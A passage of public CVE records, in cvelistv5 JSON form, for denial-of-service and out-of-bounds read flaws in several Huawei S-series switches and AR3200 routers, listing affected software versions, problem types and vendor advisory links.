               value: "IPv6 function in Huawei Quidway S2700 V200R003C00SPC300, Quidway S5300 V200R003C00SPC300, Quidway S5700 V200R003C00SPC300, S2300 V200R003C00, V200R003C00SPC300T, V200R005C00, V200R006C00, V200R007C00, V200R008C00, V200R009C00, S2700 V200R005C00, V200R006C00, V200R007C00, V200R008C00, V200R009C00, S5300 V200R003C00, V200R003C00SPC300T, V200R003C00SPC600, V200R003C02, V200R005C00, V200R005C01, V200R005C02, V200R005C03, V200R005C05, V200R006C00, V200R007C00, V200R008C00, V200R009C00, S5700 V200R003C00, V200R003C00SPC316T, V200R003C00SPC600, V200R003C02, V200R005C00, V200R005C01, V200R005C02, V200R005C03, V200R006C00, V200R007C00, V200R008C00, V200R009C00, S600-E V200R008C00, V200R009C00, S6300 V200R003C00, V200R005C00, V200R007C00, V200R008C00, V200R009C00, S6700 V200R003C00, V200R005C00, V200R005C01, V200R005C02, V200R007C00, V200R008C00, V200R009C00 has an out-of-bounds read vulnerability. An unauthenticated attacker may send crafted malformed IPv6 packets to the affected products. Due to insufficient verification of the packets, successful exploit will cause device to reset.",
            },
         ],
         problemTypes: [
            {
               descriptions: [
                  {
                     description: "out-of-bounds read",
                     lang: "en",
                     type: "text",
                  },
               ],
            },
         ],
         providerMetadata: {
            dateUpdated: "2018-02-15T15:57:02",
            orgId: "25ac1063-e409-4190-8079-24548c77ea2e",
            shortName: "huawei",
         },
         references: [
            {
               tags: [
                  "x_refsource_CONFIRM",
               ],
               url: "http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20171213-02-ipv6-en",
            },
         ],
         x_legacyV4Record: {
            CVE_data_meta: {
               ASSIGNER: "psirt@huawei.com",
               ID: "CVE-2017-17165",
               STATE: "PUBLIC",
            },
            affects: {
               vendor: {
                  vendor_data: [
                     {
                        product: {
                           product_data: [
                              {
                                 product_name: "Quidway S2700,Quidway S5300,Quidway S5700,S2300,S2700,S5300,S5700,S600-E,S6300,S6700",
                                 version: {
                                    version_data: [
                                       {
                                          version_value: "Quidway S2700 V200R003C00SPC300, Quidway S5300 V200R003C00SPC300, Quidway S5700 V200R003C00SPC300, S2300 V200R003C00, V200R003C00SPC300T, V200R005C00, V200R006C00, V200R007C00, V200R008C00, V200R009C00, S2700 V200R005C00, V200R006C00, V200R007C00, V200R008C00, V200R009C00, S5300 V200R003C00, V200R003C00SPC300T, V200R003C00SPC600, V200R003C02, V200R005C00, V200R005C01, V200R005C02, V200R005C03, V200R005C05, V200R006C00, V200R007C00, V200R008C00, V200R009C00, S5700 V200R003C00, V200R003C00SPC316T, V200R003C00SPC600, V200R003C02, V200R005C00, V200R005C01, V200R005C02, V200R005C03, V200R006C00, V200R007C00, V200R008C00, V200R009C00, S600-E V200R008C00, V200R009C00, S6300 V200R003C00, V200R005C00, V200R007C00, V200R008C00, V200R009C00, S6700 V200R003C00, V200R005C00, V200R005C01, V200R005C02, V200R007C00, V200R008C00, V200R009C00",
                                       },
                                    ],
                                 },
                              },
                           ],
                        },
                        vendor_name: "Huawei Technologies Co., Ltd.",
                     },
                  ],
               },
            },
            data_format: "MITRE",
            data_type: "CVE",
            data_version: "4.0",
            description: {
               description_data: [
                  {
                     lang: "eng",
                     value: "IPv6 function in Huawei Quidway S2700 V200R003C00SPC300, Quidway S5300 V200R003C00SPC300, Quidway S5700 V200R003C00SPC300, S2300 V200R003C00, V200R003C00SPC300T, V200R005C00, V200R006C00, V200R007C00, V200R008C00, V200R009C00, S2700 V200R005C00, V200R006C00, V200R007C00, V200R008C00, V200R009C00, S5300 V200R003C00, V200R003C00SPC300T, V200R003C00SPC600, V200R003C02, V200R005C00, V200R005C01, V200R005C02, V200R005C03, V200R005C05, V200R006C00, V200R007C00, V200R008C00, V200R009C00, S5700 V200R003C00, V200R003C00SPC316T, V200R003C00SPC600, V200R003C02, V200R005C00, V200R005C01, V200R005C02, V200R005C03, V200R006C00, V200R007C00, V200R008C00, V200R009C00, S600-E V200R008C00, V200R009C00, S6300 V200R003C00, V200R005C00, V200R007C00, V200R008C00, V200R009C00, S6700 V200R003C00, V200R005C00, V200R005C01, V200R005C02, V200R007C00, V200R008C00, V200R009C00 has an out-of-bounds read vulnerability. An unauthenticated attacker may send crafted malformed IPv6 packets to the affected products. Due to insufficient verification of the packets, successful exploit will cause device to reset.",
                  },
               ],
            },
            problemtype: {
               problemtype_data: [
                  {
                     description: [
                        {
                           lang: "eng",
                           value: "out-of-bounds read",
                        },
                     ],
                  },
               ],
            },
            references: {
               reference_data: [
                  {
                     name: "http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20171213-02-ipv6-en",
                     refsource: "CONFIRM",
                     url: "http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20171213-02-ipv6-en",
                  },
               ],
            },
         },
      },
   },
   cveMetadata: {
      assignerOrgId: "25ac1063-e409-4190-8079-24548c77ea2e",
      assignerShortName: "huawei",
      cveId: "CVE-2017-17165",
      datePublished: "2018-02-15T16:00:00",
      dateReserved: "2017-12-04T00:00:00",
      dateUpdated: "2024-08-05T20:43:59.818Z",
      state: "PUBLISHED",
   },
   dataType: "CVE_RECORD",
   dataVersion: "5.1",
}

CVE-2014-8572 (GCVE-0-2014-8572)
Vulnerability from cvelistv5
Published
2017-04-02 20:00
Modified
2024-08-06 13:18
Severity ?
Summary
Huawei AC6605 with software V200R001C00; AC6605 with software V200R002C00; ACU with software V200R001C00; ACU with software V200R002C00; S2300, S3300, S2700, S3700 with software V100R006C05 and earlier versions; S5300, S5700, S6300, S6700 with software V100R006, V200R001, V200R002, V200R003, V200R005C00SPC300 and earlier versions; S7700, S9300, S9300E, S9700 with software V100R006, V200R001, V200R002, V200R003, V200R005C00SPC300 and earlier versions could allow remote attackers to send a special SSH packet to the VRP device to cause a denial of service.
References
Impacted products
Vendor Product Version
n/a AC6605,AC6605,ACU,S2300, S3300,S2700, S3700,S5300, S5700,S6300, S6700,S7700, S9300,S9300E, S9700, AC6605 AC6605 V200R001C00, AC6605 V200R002C00,ACU ACU V200R001C00, ACU V200R002C00,S2300, S3300, V100R006C05 and earlier versions,S2700, S3700,S5300, S5700, V100R006,?S6300, S6700 V200R001, V200R002, V200R003, V200R005C00SPC300 and earlier versions,S7700, S9300, V100R006,S9300E, S9700 V200R001, V200R002, V200R003, V200R005C00SPC300 and earlier versions, Version: AC6605,AC6605,ACU,S2300, S3300,S2700, S3700,S5300, S5700,S6300, S6700,S7700, S9300,S9300E, S9700, AC6605 AC6605 V200R001C00, AC6605 V200R002C00,ACU ACU V200R001C00, ACU V200R002C00,S2300, S3300, V100R006C05 and earlier versions,S2700, S3700,S5300, S5700, V100R006,?S6300, S6700 V200R001, V200R002, V200R003, V200R005C00SPC300 and earlier versions,S7700, S9300, V100R006,S9300E, S9700 V200R001, V200R002, V200R003, V200R005C00SPC300 and earlier versions,
Show details on NVD website


{
   containers: {
      adp: [
         {
            providerMetadata: {
               dateUpdated: "2024-08-06T13:18:48.644Z",
               orgId: "af854a3a-2127-422b-91ae-364da2661108",
               shortName: "CVE",
            },
            references: [
               {
                  tags: [
                     "x_refsource_CONFIRM",
                     "x_transferred",
                  ],
                  url: "http://www.huawei.com/en/psirt/security-advisories/hw-373182",
               },
            ],
            title: "CVE Program Container",
         },
      ],
      cna: {
         affected: [
            {
               product: "AC6605,AC6605,ACU,S2300, S3300,S2700, S3700,S5300, S5700,S6300, S6700,S7700, S9300,S9300E, S9700, AC6605 AC6605 V200R001C00, AC6605 V200R002C00,ACU ACU V200R001C00, ACU V200R002C00,S2300, S3300, V100R006C05 and earlier versions,S2700, S3700,S5300, S5700, V100R006,?S6300, S6700 V200R001, V200R002, V200R003, V200R005C00SPC300 and earlier versions,S7700, S9300, V100R006,S9300E, S9700 V200R001, V200R002, V200R003, V200R005C00SPC300 and earlier versions,",
               vendor: "n/a",
               versions: [
                  {
                     status: "affected",
                     version: "AC6605,AC6605,ACU,S2300, S3300,S2700, S3700,S5300, S5700,S6300, S6700,S7700, S9300,S9300E, S9700, AC6605 AC6605 V200R001C00, AC6605 V200R002C00,ACU ACU V200R001C00, ACU V200R002C00,S2300, S3300, V100R006C05 and earlier versions,S2700, S3700,S5300, S5700, V100R006,?S6300, S6700 V200R001, V200R002, V200R003, V200R005C00SPC300 and earlier versions,S7700, S9300, V100R006,S9300E, S9700 V200R001, V200R002, V200R003, V200R005C00SPC300 and earlier versions,",
                  },
               ],
            },
         ],
         datePublic: "2017-03-27T00:00:00",
         descriptions: [
            {
               lang: "en",
               value: "Huawei AC6605 with software V200R001C00; AC6605 with software V200R002C00; ACU with software V200R001C00; ACU with software V200R002C00; S2300, S3300, S2700, S3700 with software V100R006C05 and earlier versions; S5300, S5700, S6300, S6700 with software V100R006, V200R001, V200R002, V200R003, V200R005C00SPC300 and earlier versions; S7700, S9300, S9300E, S9700 with software V100R006, V200R001, V200R002, V200R003, V200R005C00SPC300 and earlier versions could allow remote attackers to send a special SSH packet to the VRP device to cause a denial of service.",
            },
         ],
         problemTypes: [
            {
               descriptions: [
                  {
                     description: "SSH Denial of Service",
                     lang: "en",
                     type: "text",
                  },
               ],
            },
         ],
         providerMetadata: {
            dateUpdated: "2017-04-02T19:57:01",
            orgId: "25ac1063-e409-4190-8079-24548c77ea2e",
            shortName: "huawei",
         },
         references: [
            {
               tags: [
                  "x_refsource_CONFIRM",
               ],
               url: "http://www.huawei.com/en/psirt/security-advisories/hw-373182",
            },
         ],
         x_legacyV4Record: {
            CVE_data_meta: {
               ASSIGNER: "psirt@huawei.com",
               ID: "CVE-2014-8572",
               STATE: "PUBLIC",
            },
            affects: {
               vendor: {
                  vendor_data: [
                     {
                        product: {
                           product_data: [
                              {
                                 product_name: "AC6605,AC6605,ACU,S2300, S3300,S2700, S3700,S5300, S5700,S6300, S6700,S7700, S9300,S9300E, S9700, AC6605 AC6605 V200R001C00, AC6605 V200R002C00,ACU ACU V200R001C00, ACU V200R002C00,S2300, S3300, V100R006C05 and earlier versions,S2700, S3700,S5300, S5700, V100R006,?S6300, S6700 V200R001, V200R002, V200R003, V200R005C00SPC300 and earlier versions,S7700, S9300, V100R006,S9300E, S9700 V200R001, V200R002, V200R003, V200R005C00SPC300 and earlier versions,",
                                 version: {
                                    version_data: [
                                       {
                                          version_value: "AC6605,AC6605,ACU,S2300, S3300,S2700, S3700,S5300, S5700,S6300, S6700,S7700, S9300,S9300E, S9700, AC6605 AC6605 V200R001C00, AC6605 V200R002C00,ACU ACU V200R001C00, ACU V200R002C00,S2300, S3300, V100R006C05 and earlier versions,S2700, S3700,S5300, S5700, V100R006,?S6300, S6700 V200R001, V200R002, V200R003, V200R005C00SPC300 and earlier versions,S7700, S9300, V100R006,S9300E, S9700 V200R001, V200R002, V200R003, V200R005C00SPC300 and earlier versions,",
                                       },
                                    ],
                                 },
                              },
                           ],
                        },
                        vendor_name: "n/a",
                     },
                  ],
               },
            },
            data_format: "MITRE",
            data_type: "CVE",
            data_version: "4.0",
            description: {
               description_data: [
                  {
                     lang: "eng",
                     value: "Huawei AC6605 with software V200R001C00; AC6605 with software V200R002C00; ACU with software V200R001C00; ACU with software V200R002C00; S2300, S3300, S2700, S3700 with software V100R006C05 and earlier versions; S5300, S5700, S6300, S6700 with software V100R006, V200R001, V200R002, V200R003, V200R005C00SPC300 and earlier versions; S7700, S9300, S9300E, S9700 with software V100R006, V200R001, V200R002, V200R003, V200R005C00SPC300 and earlier versions could allow remote attackers to send a special SSH packet to the VRP device to cause a denial of service.",
                  },
               ],
            },
            problemtype: {
               problemtype_data: [
                  {
                     description: [
                        {
                           lang: "eng",
                           value: "SSH Denial of Service",
                        },
                     ],
                  },
               ],
            },
            references: {
               reference_data: [
                  {
                     name: "http://www.huawei.com/en/psirt/security-advisories/hw-373182",
                     refsource: "CONFIRM",
                     url: "http://www.huawei.com/en/psirt/security-advisories/hw-373182",
                  },
               ],
            },
         },
      },
   },
   cveMetadata: {
      assignerOrgId: "25ac1063-e409-4190-8079-24548c77ea2e",
      assignerShortName: "huawei",
      cveId: "CVE-2014-8572",
      datePublished: "2017-04-02T20:00:00",
      dateReserved: "2014-10-31T00:00:00",
      dateUpdated: "2024-08-06T13:18:48.644Z",
      state: "PUBLISHED",
   },
   dataType: "CVE_RECORD",
   dataVersion: "5.1",
}

CVE-2019-5285 (GCVE-0-2019-5285)
Vulnerability from cvelistv5
Published
2019-06-04 18:47
Modified
2024-08-04 19:54
Severity ?
Summary
Some Huawei S series switches have a DoS vulnerability. An unauthenticated remote attacker can send crafted packets to the affected device to exploit this vulnerability. Due to insufficient verification of the packets, successful exploitation may cause the device reboot and denial of service (DoS) condition. (Vulnerability ID: HWPSIRT-2019-03109)
Impacted products
Vendor Product Version
Huawei S12700, S12700, S12700, S12700, S12700, S12700, S12700, S12700, S1700, S1700, S1700, S1700, S1700, S1700, S2300, S2300, S2300, S2300, S2300, S2300, S2300, S2700, S2700, S2700, S2700, S2700, S2700, S2700, S2700, S5300, S5300, S5300, S5300, S5300, S5300, S5300, S5700, S5700, S5700, S5700, S5700, S5700, S5700, S5700, S5700, S600-E, S600-E, S600-E, S600-E, S600-E, S6300, S6300, S6300, S6300, S6300, S6300, S6300, S6300, S6700, S6700, S6700, S6700, S6700, S6700, S6700, S6700, S7700, S7700, S7700, S7700, S7700, S7700, S7700, S7700, S7700, S7900, S7900, S7900, S9300, S9300, S9300, S9300, S9300, S9300, S9300, S9300X, S9300X, S9300X, S9300X, S9700, S9700, S9700, S9700, S9700, S9700, S9700, S9700, S9700 Version: S12700 V200R008C00
Version: S12700 V200R010C00
Version: S12700 V200R012C00
Version: S12700 V200R013C00
Version: S12700 V200R011C10
Version: S1700 V200R008C00
Version: S1700 V200R009C00
Version: S1700 V200R010C00
Version: S1700 V200R011C10
Version: S2300 V200R003C00
Version: S2300 V200R005C00
Version: S2300 V200R008C00
Version: S2300 V200R010C00
Version: S2300 V200R011C10
Version: S2300 V200R012C00
Version: S2300 V200R013C00
Version: S2700 V200R005C00
Version: S2700 V200R006C00
Version: S2700 V200R007C00
Version: S2700 V200R008C00
Version: S2700 V200R010C00
Version: S2700 V200R011C10
Version: S2700 V200R012C00
Version: S2700 V200R013C00
Version: S5300 V200R003C00
Version: S5300 V200R005C00
Version: S5300 V200R008C00
Version: S5300 V200R010C00
Version: S5300 V200R011C10
Version: S5300 V200R012C00
Version: S5700 V200R006C00
Version: S5700 V200R007C00
Version: S5700 V200R008C00
Version: S5700 V200R010C00
Version: S5700 V200R011C10
Version: S5700 V200R012C00
Version: S5700 V200R013C00
Version: S600-E V200R008C00
Version: S600-E V200R010C00
Version: S600-E V200R011C10
Version: S600-E V200R012C00
Version: S600-E V200R013C00
Version: S6300 V200R003C00
Version: S6300 V200R005C00
Version: S6300 V200R007C00
Version: S6300 V200R008C00
Create a notification for this product.
Show details on NVD website


{
   containers: {
      adp: [
         {
            providerMetadata: {
               dateUpdated: "2024-08-04T19:54:52.359Z",
               orgId: "af854a3a-2127-422b-91ae-364da2661108",
               shortName: "CVE",
            },
            references: [
               {
                  tags: [
                     "x_refsource_CONFIRM",
                     "x_transferred",
                  ],
                  url: "https://www.huawei.com/en/psirt/security-advisories/huawei-sa-20190522-01-switch-en",
               },
               {
                  tags: [
                     "x_refsource_CONFIRM",
                     "x_transferred",
                  ],
                  url: "http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20190522-01-switch-en",
               },
            ],
            title: "CVE Program Container",
         },
      ],
      cna: {
         affected: [
            {
               product: "S12700, S12700, S12700, S12700, S12700, S12700, S12700, S12700, S1700, S1700, S1700, S1700, S1700, S1700, S2300, S2300, S2300, S2300, S2300, S2300, S2300, S2700, S2700, S2700, S2700, S2700, S2700, S2700, S2700, S5300, S5300, S5300, S5300, S5300, S5300, S5300, S5700, S5700, S5700, S5700, S5700, S5700, S5700, S5700, S5700, S600-E, S600-E, S600-E, S600-E, S600-E, S6300, S6300, S6300, S6300, S6300, S6300, S6300, S6300, S6700, S6700, S6700, S6700, S6700, S6700, S6700, S6700, S7700, S7700, S7700, S7700, S7700, S7700, S7700, S7700, S7700, S7900, S7900, S7900, S9300, S9300, S9300, S9300, S9300, S9300, S9300, S9300X, S9300X, S9300X, S9300X, S9700, S9700, S9700, S9700, S9700, S9700, S9700, S9700, S9700",
               vendor: "Huawei",
               versions: [
                  {
                     status: "affected",
                     version: "S12700 V200R008C00",
                  },
                  {
                     status: "affected",
                     version: "S12700 V200R010C00",
                  },
                  {
                     status: "affected",
                     version: "S12700 V200R012C00",
                  },
                  {
                     status: "affected",
                     version: "S12700 V200R013C00",
                  },
                  {
                     status: "affected",
                     version: "S12700 V200R011C10",
                  },
                  {
                     status: "affected",
                     version: "S1700 V200R008C00",
                  },
                  {
                     status: "affected",
                     version: "S1700 V200R009C00",
                  },
                  {
                     status: "affected",
                     version: "S1700 V200R010C00",
                  },
                  {
                     status: "affected",
                     version: "S1700 V200R011C10",
                  },
                  {
                     status: "affected",
                     version: "S2300 V200R003C00",
                  },
                  {
                     status: "affected",
                     version: "S2300 V200R005C00",
                  },
                  {
                     status: "affected",
                     version: "S2300 V200R008C00",
                  },
                  {
                     status: "affected",
                     version: "S2300 V200R010C00",
                  },
                  {
                     status: "affected",
                     version: "S2300 V200R011C10",
                  },
                  {
                     status: "affected",
                     version: "S2300 V200R012C00",
                  },
                  {
                     status: "affected",
                     version: "S2300 V200R013C00",
                  },
                  {
                     status: "affected",
                     version: "S2700 V200R005C00",
                  },
                  {
                     status: "affected",
                     version: "S2700 V200R006C00",
                  },
                  {
                     status: "affected",
                     version: "S2700 V200R007C00",
                  },
                  {
                     status: "affected",
                     version: "S2700 V200R008C00",
                  },
                  {
                     status: "affected",
                     version: "S2700 V200R010C00",
                  },
                  {
                     status: "affected",
                     version: "S2700 V200R011C10",
                  },
                  {
                     status: "affected",
                     version: "S2700 V200R012C00",
                  },
                  {
                     status: "affected",
                     version: "S2700 V200R013C00",
                  },
                  {
                     status: "affected",
                     version: "S5300 V200R003C00",
                  },
                  {
                     status: "affected",
                     version: "S5300 V200R005C00",
                  },
                  {
                     status: "affected",
                     version: "S5300 V200R008C00",
                  },
                  {
                     status: "affected",
                     version: "S5300 V200R010C00",
                  },
                  {
                     status: "affected",
                     version: "S5300 V200R011C10",
                  },
                  {
                     status: "affected",
                     version: "S5300 V200R012C00",
                  },
                  {
                     status: "affected",
                     version: "S5700 V200R006C00",
                  },
                  {
                     status: "affected",
                     version: "S5700 V200R007C00",
                  },
                  {
                     status: "affected",
                     version: "S5700 V200R008C00",
                  },
                  {
                     status: "affected",
                     version: "S5700 V200R010C00",
                  },
                  {
                     status: "affected",
                     version: "S5700 V200R011C10",
                  },
                  {
                     status: "affected",
                     version: "S5700 V200R012C00",
                  },
                  {
                     status: "affected",
                     version: "S5700 V200R013C00",
                  },
                  {
                     status: "affected",
                     version: "S600-E V200R008C00",
                  },
                  {
                     status: "affected",
                     version: "S600-E V200R010C00",
                  },
                  {
                     status: "affected",
                     version: "S600-E V200R011C10",
                  },
                  {
                     status: "affected",
                     version: "S600-E V200R012C00",
                  },
                  {
                     status: "affected",
                     version: "S600-E V200R013C00",
                  },
                  {
                     status: "affected",
                     version: "S6300 V200R003C00",
                  },
                  {
                     status: "affected",
                     version: "S6300 V200R005C00",
                  },
                  {
                     status: "affected",
                     version: "S6300 V200R007C00",
                  },
                  {
                     status: "affected",
                     version: "S6300 V200R008C00",
                  },
               ],
            },
         ],
         datePublic: "2019-05-22T00:00:00",
         descriptions: [
            {
               lang: "en",
               value: "Some Huawei S series switches have a DoS vulnerability. An unauthenticated remote attacker can send crafted packets to the affected device to exploit this vulnerability. Due to insufficient verification of the packets, successful exploitation may cause the device reboot and denial of service (DoS) condition. (Vulnerability ID: HWPSIRT-2019-03109)",
            },
         ],
         problemTypes: [
            {
               descriptions: [
                  {
                     description: "DoS",
                     lang: "en",
                     type: "text",
                  },
               ],
            },
         ],
         providerMetadata: {
            dateUpdated: "2019-07-26T10:06:01",
            orgId: "25ac1063-e409-4190-8079-24548c77ea2e",
            shortName: "huawei",
         },
         references: [
            {
               tags: [
                  "x_refsource_CONFIRM",
               ],
               url: "https://www.huawei.com/en/psirt/security-advisories/huawei-sa-20190522-01-switch-en",
            },
            {
               tags: [
                  "x_refsource_CONFIRM",
               ],
               url: "http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20190522-01-switch-en",
            },
         ],
         x_legacyV4Record: {
            CVE_data_meta: {
               ASSIGNER: "psirt@huawei.com",
               ID: "CVE-2019-5285",
               STATE: "PUBLIC",
            },
            affects: {
               vendor: {
                  vendor_data: [
                     {
                        product: {
                           product_data: [
                              {
                                 product_name: "S12700, S12700, S12700, S12700, S12700, S12700, S12700, S12700, S1700, S1700, S1700, S1700, S1700, S1700, S2300, S2300, S2300, S2300, S2300, S2300, S2300, S2700, S2700, S2700, S2700, S2700, S2700, S2700, S2700, S5300, S5300, S5300, S5300, S5300, S5300, S5300, S5700, S5700, S5700, S5700, S5700, S5700, S5700, S5700, S5700, S600-E, S600-E, S600-E, S600-E, S600-E, S6300, S6300, S6300, S6300, S6300, S6300, S6300, S6300, S6700, S6700, S6700, S6700, S6700, S6700, S6700, S6700, S7700, S7700, S7700, S7700, S7700, S7700, S7700, S7700, S7700, S7900, S7900, S7900, S9300, S9300, S9300, S9300, S9300, S9300, S9300, S9300X, S9300X, S9300X, S9300X, S9700, S9700, S9700, S9700, S9700, S9700, S9700, S9700, S9700",
                                 version: {
                                    version_data: [
                                       {
                                          version_value: "S12700 V200R008C00",
                                       },
                                       {
                                          version_value: "S12700 V200R010C00",
                                       },
                                       {
                                          version_value: "S12700 V200R012C00",
                                       },
                                       {
                                          version_value: "S12700 V200R013C00",
                                       },
                                       {
                                          version_value: "S12700 V200R011C10",
                                       },
                                       {
                                          version_value: "S1700 V200R008C00",
                                       },
                                       {
                                          version_value: "S1700 V200R009C00",
                                       },
                                       {
                                          version_value: "S1700 V200R010C00",
                                       },
                                       {
                                          version_value: "S1700 V200R011C10",
                                       },
                                       {
                                          version_value: "S2300 V200R003C00",
                                       },
                                       {
                                          version_value: "S2300 V200R005C00",
                                       },
                                       {
                                          version_value: "S2300 V200R008C00",
                                       },
                                       {
                                          version_value: "S2300 V200R010C00",
                                       },
                                       {
                                          version_value: "S2300 V200R011C10",
                                       },
                                       {
                                          version_value: "S2300 V200R012C00",
                                       },
                                       {
                                          version_value: "S2300 V200R013C00",
                                       },
                                       {
                                          version_value: "S2700 V200R005C00",
                                       },
                                       {
                                          version_value: "S2700 V200R006C00",
                                       },
                                       {
                                          version_value: "S2700 V200R007C00",
                                       },
                                       {
                                          version_value: "S2700 V200R008C00",
                                       },
                                       {
                                          version_value: "S2700 V200R010C00",
                                       },
                                       {
                                          version_value: "S2700 V200R011C10",
                                       },
                                       {
                                          version_value: "S2700 V200R012C00",
                                       },
                                       {
                                          version_value: "S2700 V200R013C00",
                                       },
                                       {
                                          version_value: "S5300 V200R003C00",
                                       },
                                       {
                                          version_value: "S5300 V200R005C00",
                                       },
                                       {
                                          version_value: "S5300 V200R008C00",
                                       },
                                       {
                                          version_value: "S5300 V200R010C00",
                                       },
                                       {
                                          version_value: "S5300 V200R011C10",
                                       },
                                       {
                                          version_value: "S5300 V200R012C00",
                                       },
                                       {
                                          version_value: "S5700 V200R006C00",
                                       },
                                       {
                                          version_value: "S5700 V200R007C00",
                                       },
                                       {
                                          version_value: "S5700 V200R008C00",
                                       },
                                       {
                                          version_value: "S5700 V200R010C00",
                                       },
                                       {
                                          version_value: "S5700 V200R011C10",
                                       },
                                       {
                                          version_value: "S5700 V200R012C00",
                                       },
                                       {
                                          version_value: "S5700 V200R013C00",
                                       },
                                       {
                                          version_value: "S600-E V200R008C00",
                                       },
                                       {
                                          version_value: "S600-E V200R010C00",
                                       },
                                       {
                                          version_value: "S600-E V200R011C10",
                                       },
                                       {
                                          version_value: "S600-E V200R012C00",
                                       },
                                       {
                                          version_value: "S600-E V200R013C00",
                                       },
                                       {
                                          version_value: "S6300 V200R003C00",
                                       },
                                       {
                                          version_value: "S6300 V200R005C00",
                                       },
                                       {
                                          version_value: "S6300 V200R007C00",
                                       },
                                       {
                                          version_value: "S6300 V200R008C00",
                                       },
                                    ],
                                 },
                              },
                           ],
                        },
                        vendor_name: "Huawei",
                     },
                  ],
               },
            },
            data_format: "MITRE",
            data_type: "CVE",
            data_version: "4.0",
            description: {
               description_data: [
                  {
                     lang: "eng",
                     value: "Some Huawei S series switches have a DoS vulnerability. An unauthenticated remote attacker can send crafted packets to the affected device to exploit this vulnerability. Due to insufficient verification of the packets, successful exploitation may cause the device reboot and denial of service (DoS) condition. (Vulnerability ID: HWPSIRT-2019-03109)",
                  },
               ],
            },
            problemtype: {
               problemtype_data: [
                  {
                     description: [
                        {
                           lang: "eng",
                           value: "DoS",
                        },
                     ],
                  },
               ],
            },
            references: {
               reference_data: [
                  {
                     name: "https://www.huawei.com/en/psirt/security-advisories/huawei-sa-20190522-01-switch-en",
                     refsource: "CONFIRM",
                     url: "https://www.huawei.com/en/psirt/security-advisories/huawei-sa-20190522-01-switch-en",
                  },
                  {
                     name: "http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20190522-01-switch-en",
                     refsource: "CONFIRM",
                     url: "http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20190522-01-switch-en",
                  },
               ],
            },
         },
      },
   },
   cveMetadata: {
      assignerOrgId: "25ac1063-e409-4190-8079-24548c77ea2e",
      assignerShortName: "huawei",
      cveId: "CVE-2019-5285",
      datePublished: "2019-06-04T18:47:35",
      dateReserved: "2019-01-04T00:00:00",
      dateUpdated: "2024-08-04T19:54:52.359Z",
      state: "PUBLISHED",
   },
   dataType: "CVE_RECORD",
   dataVersion: "5.1",
}

CVE-2016-8797 (GCVE-0-2016-8797)
Vulnerability from cvelistv5
Published
2017-04-02 20:00
Modified
2024-08-06 02:35
Severity ?
Summary
Huawei AR3200 with software V200R007C00, V200R005C32, V200R005C20; S12700 with software V200R008C00, V200R007C00; S5300 with software V200R008C00, V200R007C00, V200R006C00; S5700 with software V200R008C00, V200R007C00, V200R006C00; S6300 with software V200R008C00, V200R007C00; S6700 with software V200R008C00, V200R007C00; S7700 with software V200R008C00, V200R007C00, V200R006C00; S9300 with software V200R008C00, V200R007C00, V200R006C00; and S9700 with software V200R008C00, V200R007C00, V200R006C00 allow remote attackers to send abnormal Multiprotocol Label Switching (MPLS) packets to cause memory exhaustion.
Impacted products
Vendor Product Version
n/a AR3200,S12700,S5300,S5700,S6300,S6700,S7700,S9300,S9700 AR3200 V200R007C00, V200R005C32, V200R005C20,S12700 V200R008C00, V200R007C00,S5300 V200R008C00, V200R007C00, V200R006C00,S5700 V200R008C00, V200R007C00, V200R006C00,S6300 V200R008C00, V200R007C00,S6700 V200R008C00, V200R007C00,S7700 V200R008C00, V200R007C00, V200R006C00,S9300 V200R008C00, V200R007C00, V200R006C00,S9700 V200R008C00, V200R007C00, V200R006C00, Version: AR3200,S12700,S5300,S5700,S6300,S6700,S7700,S9300,S9700 AR3200 V200R007C00, V200R005C32, V200R005C20,S12700 V200R008C00, V200R007C00,S5300 V200R008C00, V200R007C00, V200R006C00,S5700 V200R008C00, V200R007C00, V200R006C00,S6300 V200R008C00, V200R007C00,S6700 V200R008C00, V200R007C00,S7700 V200R008C00, V200R007C00, V200R006C00,S9300 V200R008C00, V200R007C00, V200R006C00,S9700 V200R008C00, V200R007C00, V200R006C00,
Show details on NVD website


{
   containers: {
      adp: [
         {
            providerMetadata: {
               dateUpdated: "2024-08-06T02:35:02.049Z",
               orgId: "af854a3a-2127-422b-91ae-364da2661108",
               shortName: "CVE",
            },
            references: [
               {
                  tags: [
                     "x_refsource_CONFIRM",
                     "x_transferred",
                  ],
                  url: "http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20160608-01-mpls-en",
               },
            ],
            title: "CVE Program Container",
         },
      ],
      cna: {
         affected: [
            {
               product: "AR3200,S12700,S5300,S5700,S6300,S6700,S7700,S9300,S9700 AR3200 V200R007C00, V200R005C32, V200R005C20,S12700 V200R008C00, V200R007C00,S5300 V200R008C00, V200R007C00, V200R006C00,S5700 V200R008C00, V200R007C00, V200R006C00,S6300 V200R008C00, V200R007C00,S6700 V200R008C00, V200R007C00,S7700 V200R008C00, V200R007C00, V200R006C00,S9300 V200R008C00, V200R007C00, V200R006C00,S9700 V200R008C00, V200R007C00, V200R006C00,",
               vendor: "n/a",
               versions: [
                  {
                     status: "affected",
                     version: "AR3200,S12700,S5300,S5700,S6300,S6700,S7700,S9300,S9700 AR3200 V200R007C00, V200R005C32, V200R005C20,S12700 V200R008C00, V200R007C00,S5300 V200R008C00, V200R007C00, V200R006C00,S5700 V200R008C00, V200R007C00, V200R006C00,S6300 V200R008C00, V200R007C00,S6700 V200R008C00, V200R007C00,S7700 V200R008C00, V200R007C00, V200R006C00,S9300 V200R008C00, V200R007C00, V200R006C00,S9700 V200R008C00, V200R007C00, V200R006C00,",
                  },
               ],
            },
         ],
         datePublic: "2017-03-27T00:00:00",
         descriptions: [
            {
               lang: "en",
               value: "Huawei AR3200 with software V200R007C00, V200R005C32, V200R005C20; S12700 with software V200R008C00, V200R007C00; S5300 with software V200R008C00, V200R007C00, V200R006C00; S5700 with software V200R008C00, V200R007C00, V200R006C00; S6300 with software V200R008C00, V200R007C00; S6700 with software V200R008C00, V200R007C00; S7700 with software V200R008C00, V200R007C00, V200R006C00; S9300 with software V200R008C00, V200R007C00, V200R006C00; and S9700 with software V200R008C00, V200R007C00, V200R006C00 allow remote attackers to send abnormal Multiprotocol Label Switching (MPLS) packets to cause memory exhaustion.",
            },
         ],
         problemTypes: [
            {
               descriptions: [
                  {
                     description: "memory leak",
                     lang: "en",
                     type: "text",
